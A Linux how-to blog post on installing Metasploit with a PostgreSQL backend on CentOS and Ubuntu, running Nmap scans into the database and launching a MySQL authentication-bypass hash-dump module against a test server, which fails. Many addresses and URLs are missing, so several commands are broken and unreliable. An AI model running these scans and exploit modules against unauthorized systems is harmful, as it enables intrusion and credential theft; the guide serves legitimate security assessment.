All Linux HowTo's Security HowTo's

You Don’t Need a Vulnerability Scanner, Use Nmap & Metasploit

This article walks you through the process of installing, configuring and running scans using Metasploit and Nmap. Both CentOS 7 and Ubuntu 20.04 are discussed. Our objective is to be able to run nmap scans and have the results go into a database so we can filter the results later and then use Metasploit to exploit based on our options given the exposed services on hosts discovered in the scans. This article is based on details from several places including:

Install Postgres and some other tools we generally use:

yum install postgresql postgresql-server nmap curl wget tcpdump


apt install postgresql postgresql-contrib nmap curl wget tcpdump

Install Metasploit:

curl > msfinstall && \
  chmod 755 msfinstall && \

Run the initial DB setup. This also creates some directories we need:

postgresql-setup initdb

Update your configuration file. For my system, only the lines indicated below were needed in the file. All other lines were removed. Take a backup of the file before removing anything:

CentOS: /var/lib/pgsql/data/pg_hba.conf
Ubuntu: /etc/postgresql/12/main/pg_hba.conf


host    msf_database    msf_user            md5


local   all             postgres                                peer
local   all             all                                     peer
host    all             all               md5
host    msf_database    msf_user            md5

The remainder of this article should be the same on both CentOS and Ubuntu.

Enable and start the DB:

systemctl enable postgresql
systemctl restart postgresql

Create the DB and user:

su postgres
createuser msf_user -P
createdb --owner=msf_user msf_database
	Ignore directory permission errors. 

Install Metasploit:

curl > msfinstall

TIP: Metasploit will be installed to “/opt/metasploit-framework/”. The “bin” directory is “/opt/metasploit-framework/bin”.

Create the file “/opt/metasploit-framework/embedded/framework/config/database.yml” and add the following content. Change the password to whatever you set in the above steps:

adapter: "postgresql"
database: "msf_database"
username: "msf_user"
password: "MYPASSWORD"
port: 5432
host: "localhost"
pool: 256
timeout: 5
adapter: "postgresql"
database: "msf_database"
username: "msf_user"
password: "MYPASSWORD"
port: 5432
host: "localhost"
pool: 256
timeout: 5

Run Metasploit and see if you can connect to the database:

db_connect msf_user:MYPASSWORD@

Create a Workspace (see details here “”) and switch to it:

# workspace -a TestWork
# workspace TestWork

And conduct a scan of your target subnet:

# db_nmap -sV -p 80,443  443   tcp    ssl/https  open      VMware ESXi SOAP API 6.5.0  443   tcp    ssl/http   open      Microsoft IIS httpd 10.0  443   tcp    ssl/http   open      Apache httpd Express

TIP: The -sV tells nmap to get more details about the services listening on ports. Ie, version numbers.

The above scan is saved to the DB. Now we can sort through the results using basic queries. For example, get all hosts with port 443 or 3306 open:

# services -p 443,3306 -u

host           port  proto  name   state  info
----           ----  -----  ----   -----  ----  443   tcp    ssl/http   open      Apache httpd 2.4  443   tcp    ssl/http   open      Apache httpd 2.4  443   tcp    ssl/http   open      Apache httpd Express  443   tcp    ssl/http   open      Apache httpd Express  443   tcp    ssl/http   open      Apache httpd Express  3306  tcp    mysql  open   MySQL 5.5.5-10.3.28-MariaDB

TIP: The -p allows you to list comma separated port numbers. The -u shows only hosts that list the given port/s as open.

Now we can search for exploits that match our targets. In this example, we’ll focus on exploits relating to “mysql” with a rank of “excellent”:

# search rank:excellent mysql

Actually conducting an exploit attempt:

msf6 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > options

Module options (auxiliary/scanner/mysql/mysql_authbypass_hashdump):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS file:/tmp/msf-db-rhosts-20210824-1501072-r8icdz yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 3306 yes The target port (TCP)
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root yes The username to authenticate as

msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set rhost
rhost =>
msf6 auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run

[+] - The server allows logins, proceeding with bypass test
[*] - Authentication bypass is 10% complete
[*] - Authentication bypass is 20% complete
[*] - Authentication bypass is 30% complete
[*] - Authentication bypass is 90% complete
[*] - Authentication bypass is 100% complete
[-] - Unable to bypass authentication, this target may not be vulnerable
[*] - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

I suppose it’s good that the test server was not successfully exploited.

You can run your scans in the background on a schedule using the following example command. Put this into a script of cronjob for scheduling:

# nohup msfconsole -x "db_connect msf_user:MYPASSWORD@" -x "db_nmap -A" &

Check on the progress by running:

tail -f nohup.out


If you have trouble, it’s likely to do with the database. You can see if Metasploit is the issue or the DB config by trying to connect to it using the psgl cli command:

psql -h -U msf_user --password -d msf_database

Similar Posts:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.